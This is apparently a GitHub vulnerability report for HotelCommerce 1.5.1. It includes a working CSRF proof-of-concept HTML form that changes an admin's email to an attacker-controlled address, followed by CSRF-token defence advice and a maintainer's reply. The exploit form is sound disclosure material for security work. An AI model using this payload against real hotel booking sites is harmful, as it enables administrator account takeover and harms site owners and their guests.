CSRF

[dillonkirsch]

There is a CSRF in HotelCommerce 1.5.1. It can allow anyone to change the admin email while they are logged in.

Here is some POC code:

  <body>
  <script>history.pushState('', '', '/')</script>
    <!-- Change the URL. -->
    <form action="http://localhost/hotelcommerce-1.5.1/admin817ktdqdy/index.php?controller=AdminEmployees&token=22a1400c787d9df2147511ad66bcdcba" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="id&#95;employee" value="1" />
      <input type="hidden" name="submitAddemployee" value="1" />
      <input type="hidden" name="firstname" value="Firstname" />
      <input type="hidden" name="lastname" value="Lastname" />
          <!-- Change the email below to whatever you would like. -->
      <input type="hidden" name="email" value="badguy&#64;gmail&#46;com" />
      <input type="hidden" name="old&#95;passwd" value="" />
      <input type="hidden" name="passwd" value="" />
      <input type="hidden" name="passwd2" value="" />
      <input type="hidden" name="passwd&#95;send&#95;email" value="on" />
      <input type="hidden" name="optin" value="1" />
      <input type="hidden" name="default&#95;tab" value="1" />
      <input type="hidden" name="id&#95;lang" value="1" />
      <input type="hidden" name="bo&#95;theme&#95;css" value="default&#124;admin&#45;theme&#46;css" />
      <input type="hidden" name="bo&#95;menu" value="0" />
      <input type="hidden" name="submitAddemployee" value="1" />
        <label for="firstname">Firstname:</label><br>
    <input type="text" id="first_name" name="first_name"><br>
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Defense/How to prevent it - CSRF Tokens

• How should CSRF token be generated
  • unpredictable with high entropy, similar to session tokens.
  • Tied to the user's session
  • Validated before the relevant action is executed
• How should CSRF tokens be transmitted?
  • Hidden Field of an HTML form that is submitted using a POST method
  • Customer request header
  • Token submitted in the URL query string are less secure
  • Tokens generally should not be transmitted within cookies
• How should CSRF tokens be validated?
  • Generated token should be stored server-side within the user's session data
  • When performing a request, a validation should be performed that verifies that the submitted token matches the value that is stored in the user's session
  • Validation should be performed regardless of HTTP method or content type of the request
  • If a token is not submitted, the request should be rejected

[shreesh-webkul]

@dillonkirsch This is a Vulnerability issue, so we will need to solve this issue internally and will raise a PR for this issue.